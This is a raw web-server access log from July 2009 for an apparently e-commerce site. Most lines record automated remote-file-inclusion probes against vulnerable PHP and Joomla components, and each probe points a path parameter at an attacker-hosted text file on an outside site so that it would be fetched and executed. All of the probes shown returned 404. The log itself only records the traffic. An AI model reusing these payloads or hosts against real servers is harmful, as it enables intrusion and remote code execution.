76.12.17.218 - - [10/Jul/2009:04:43:41 -0400] "GET /logs/access_log.Q109062100//4nAlbum/public/displayCategory.php?basepath=http://www.perfumechaletusa.com/images/baner.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
83.132.125.167 - - [10/Jul/2009:04:43:44 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1145164607A4E600243107O+M37+ENG HTTP/1.1" 200 68198 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1145164B0034D600195107O+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
121.124.127.34 - - [10/Jul/2009:04:43:46 -0400] "GET /logs/access_log.Q109051000%20%20//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.132.125.167 - - [10/Jul/2009:04:43:53 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1145164D0B44D60029E107O+M37+ENG HTTP/1.1" 200 68224 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1145164607A4E600243107O+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
121.124.127.34 - - [10/Jul/2009:04:43:57 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.132.125.167 - - [10/Jul/2009:04:44:01 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L114516450504260036A107O+M37+ENG HTTP/1.1" 200 68296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1145164D0B44D60029E107O+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [10/Jul/2009:04:44:08 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1145164D0B84E600387107O+M37+ENG HTTP/1.1" 200 68190 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L114516450504260036A107O+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [10/Jul/2009:04:44:14 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L114516450954C600441107O+M37+ENG HTTP/1.1" 200 68093 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1145164D0B84E600387107O+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [10/Jul/2009:04:44:24 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1145164A059416004BD107O+M37+ENG HTTP/1.1" 200 68603 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L114516450954C600441107O+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [10/Jul/2009:04:44:27 -0400] "GET /images/items/0033168_THUMB.JPG HTTP/1.1" 200 1895 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1145164A059416004BD107O+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [10/Jul/2009:04:44:34 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1145164405A476005BD107O+M37+ENG HTTP/1.1" 200 69408 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1145164A059416004BD107O+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [10/Jul/2009:04:44:40 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1145164D03C4A6005A0107O+M37+ENG HTTP/1.1" 200 68205 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1145164405A476005BD107O+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
65.23.158.226 - - [10/Jul/2009:04:45:18 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
65.23.158.226 - - [10/Jul/2009:04:45:19 -0400] "GET /logs/access_log.Q109051300/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
65.23.158.226 - - [10/Jul/2009:04:45:19 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
65.23.158.226 - - [10/Jul/2009:04:45:25 -0400] "GET /logs/access_log.Q109052200/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
83.16.182.130 - - [10/Jul/2009:04:46:26 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.itechwon.co.kr//bbs/include/id1.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
83.16.182.130 - - [10/Jul/2009:04:46:28 -0400] "GET /logs/access_log.Q109052500%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.itechwon.co.kr//bbs/include/id1.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:04:46:46 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 248 "-" "libwww-perl/5.811"
205.234.187.238 - - [10/Jul/2009:04:46:46 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 253 "-" "libwww-perl/5.811"
205.234.187.238 - - [10/Jul/2009:04:46:46 -0400] "GET /logs/access_log.Q109051300/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811"
205.234.187.238 - - [10/Jul/2009:04:46:59 -0400] "GET /logs/access_log.Q109052200/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811"
200.101.70.1 - - [10/Jul/2009:04:47:11 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
200.101.70.1 - - [10/Jul/2009:04:47:11 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
200.101.70.1 - - [10/Jul/2009:04:47:11 -0400] "GET /logs/access_log.Q109062200%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
217.169.210.130 - - [10/Jul/2009:04:47:30 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_banners&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.76"
217.169.210.130 - - [10/Jul/2009:04:47:30 -0400] "GET //index.php?option=com_banners&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.76"
217.169.210.130 - - [10/Jul/2009:04:47:31 -0400] "GET /logs//index.php?option=com_banners&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.76"
209.59.12.99 - - [10/Jul/2009:04:47:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
114.200.199.144 - - [10/Jul/2009:04:47:58 -0400] "GET /logs/index1.php?=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:04:47:58 -0400] "GET /index1.php?=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:04:47:58 -0400] "GET /logs/access_log.Q109062100%20%20/index1.php?=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:04:48:08 -0400] "GET /logs/access_log.Q109062400%20%20/ktmlpro//includes/ktedit/toolbar.php?dirDepth=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:04:48:09 -0400] "GET /logs/access_log.Q109070100%20%20/ktmlpro//includes/ktedit/toolbar.php?dirDepth=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
200.101.70.1 - - [10/Jul/2009:04:48:22 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
200.101.70.1 - - [10/Jul/2009:04:48:22 -0400] "GET /logs/access_log.Q109062200//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
200.101.70.1 - - [10/Jul/2009:04:48:23 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
83.16.182.130 - - [10/Jul/2009:04:48:27 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.itechwon.co.kr//bbs/include/id1.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
83.16.182.130 - - [10/Jul/2009:04:48:28 -0400] "GET /logs/access_log.Q109052500%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.itechwon.co.kr//bbs/include/id1.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
217.169.210.130 - - [10/Jul/2009:04:49:26 -0400] "GET /logs/error_log.Q109052300//index.php?option=com_banners&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.76"
65.254.32.2 - - [10/Jul/2009:04:49:46 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:04:49:46 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:04:49:47 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:49:57 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:49:57 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:49:58 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:04:49:58 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
200.101.70.1 - - [10/Jul/2009:04:50:23 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
200.101.70.1 - - [10/Jul/2009:04:50:23 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
200.101.70.1 - - [10/Jul/2009:04:50:27 -0400] "GET /logs/access_log.Q109062200//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:50:27 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
200.101.70.1 - - [10/Jul/2009:04:50:42 -0400] "GET /logs/access_log.Q109062200//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:04:50:58 -0400] "GET /logs/access_log.Q109051300/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:04:50:58 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:04:50:59 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
200.101.70.1 - - [10/Jul/2009:04:51:08 -0400] "GET /logs/access_log.Q109062200%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:04:51:13 -0400] "GET /logs/access_log.Q109052200/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:04:51:13 -0400] "GET /logs/access_log.Q109051300%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:04:51:13 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:04:51:13 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:04:51:22 -0400] "GET /logs/access_log.Q109052200%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:04:51:39 -0400] "GET /logs/access_log.Q109070300//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:04:51:39 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:04:51:39 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:04:52:15 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:04:52:15 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:04:52:15 -0400] "GET /logs/access_log.Q109051300/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:04:52:17 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:04:52:17 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:04:52:17 -0400] "GET /logs/access_log.Q109051300/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:04:52:19 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:04:52:19 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:04:52:20 -0400] "GET /logs/access_log.Q109070300//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:04:52:22 -0400] "GET /logs/access_log.Q109052200/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:04:52:23 -0400] "GET /logs/access_log.Q109052200/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
79.148.238.69 - - [10/Jul/2009:04:52:23 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_banners&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
79.148.238.69 - - [10/Jul/2009:04:52:29 -0400] "GET //index.php?option=com_banners&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
79.148.238.69 - - [10/Jul/2009:04:52:29 -0400] "GET /logs//index.php?option=com_banners&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
209.59.12.99 - - [10/Jul/2009:04:52:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
114.200.199.144 - - [10/Jul/2009:04:53:05 -0400] "GET /logs/access_log.Q109060600%20%20/index1.php?=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:04:53:21 -0400] "GET /logs/access_log.Q109051000%20%20//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:04:53:33 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
79.148.238.69 - - [10/Jul/2009:04:53:36 -0400] "GET /logs/error_log.Q109052300//index.php?option=com_banners&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
114.200.199.144 - - [10/Jul/2009:04:54:18 -0400] "GET /logs/access_log.Q109051300%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:04:54:28 -0400] "GET /logs/access_log.Q109052200%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
88.191.37.60 - - [10/Jul/2009:04:54:29 -0400] "GET /logs/access_log.Q109051200%20%20//zb41/include/write.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:04:54:31 -0400] "GET /logs/access_log.Q109053100%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:04:54:31 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
200.101.70.1 - - [10/Jul/2009:04:54:39 -0400] "GET /logs/access_log.Q109062200%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
88.191.37.60 - - [10/Jul/2009:04:54:42 -0400] "GET /logs/access_log.Q109053100%20%20//zb41/include/write.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.65.20.132 - - [10/Jul/2009:04:55:22 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://aboutav.com//id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
216.65.20.132 - - [10/Jul/2009:04:55:22 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://aboutav.com//id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
210.205.57.2 - - [10/Jul/2009:04:55:40 -0400] "GET /logs/access_log.Q109060300//components/com_simpleboard/file_upload.php?sbp=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
210.205.57.2 - - [10/Jul/2009:04:55:40 -0400] "GET /logs/access_log.Q109061300//components/com_simpleboard/file_upload.php?sbp=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
88.191.37.60 - - [10/Jul/2009:04:55:46 -0400] "GET /logs/access_log.Q109051200//zb41/include/write.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
88.191.37.60 - - [10/Jul/2009:04:55:46 -0400] "GET /logs//zb41/include/write.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
88.191.37.60 - - [10/Jul/2009:04:55:46 -0400] "GET //zb41/include/write.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
88.191.37.60 - - [10/Jul/2009:04:56:25 -0400] "GET /logs/access_log.Q109053100//zb41/include/write.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:04:56:28 -0400] "GET /logs/access_log.Q109062100/index1.php?=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.65.20.132 - - [10/Jul/2009:04:56:57 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://aboutav.com//id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jul/2009:04:57:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
59.22.140.17 - - [10/Jul/2009:04:58:02 -0400] "GET /logs/access_log.Q109070300%20%20//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
201.45.123.132 - - [10/Jul/2009:04:58:06 -0400] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
201.45.123.132 - - [10/Jul/2009:04:58:06 -0400] "GET /logs/access_log.Q109061300/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
201.45.123.132 - - [10/Jul/2009:04:58:06 -0400] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:58:19 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
216.65.20.132 - - [10/Jul/2009:04:58:43 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://aboutav.com//id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
201.45.123.132 - - [10/Jul/2009:04:58:51 -0400] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
201.45.123.132 - - [10/Jul/2009:04:58:51 -0400] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
